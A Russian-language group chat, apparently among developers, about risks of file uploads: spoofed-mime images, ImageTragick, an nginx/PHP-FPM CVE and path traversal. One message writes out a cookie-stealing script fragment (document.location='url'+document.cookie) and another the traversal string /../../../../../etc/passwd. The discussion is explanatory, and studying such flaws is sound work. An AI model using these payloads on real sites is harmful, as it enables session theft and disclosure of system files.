если на пхп

то очевидно да

а это хуета пхплиги

ахахаха

все

S3 тоже клоуны пользуются?

ты победил

расскажи всем во дворе

я спать.. ато чет вторник все никак не заканчивается

крч, вдруг между делом, тут кому-то стало интересно, просто стоило ответить на вопрос, что будет если имеется картинка, с подмененным mime type загруженная на cdn содержащая в себе document.location='url'+document.cookie
и которая по итогу будет выведена через img src где-то на сайте, рекомендую задуматься
еще в пыльных двухтысячных везде пихали svg/gif на всратых форумах и собирали стиллерами куки со всех
еще с 1997-го года


imageTragick не просто так появилась шняга

а если зайти сюда и посмотреть https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/README.md#php-extension

то можно и кейс с загрузкой через curl —binary с application/octet-stream и последующим удаленным вызовом посмотреть просто нажав CTRL+F в репе и проскролить до первого матча

сходите на шаг назад в репе, это только то, что умельцы собрали ради фана

не говоря уже, допустим, о том, что многие статику отдают nginx'ом, допустим
вот последняя cve с удаленным выполнением кода
https://www.nginx.com/blog/php-fpm-cve-2019-11043-vulnerability-nginx/
уязвимый конфиг которого можно было найти у slim фреймворка, на сайте

в большинстве случаев, ты енивей будешь уязвим но жив и цел, пока превалируемый профит явно меньше трудозатрат, но показывать наружу кишки, а самый просто способ получить path traversal как раз что то зааплодить, допустим написать новость на новостной сайт и получить картинку с, uploads/images/123.jpg допустим

поверьте мне, сайтов, которые написанны в 2000-е или еще хуже в 2020-е но теми же уебанами, которые схавают /../../../../../etc/passwd

дохуища

Завтра у себя проверю

Схавает или нет, а то мало ли

кавычек еще везде наставь

))

+++

и даже в именитых платформах такого говна темный лет

кмон, вконтач 4 недели назад паблик дискложур на этой основе сделал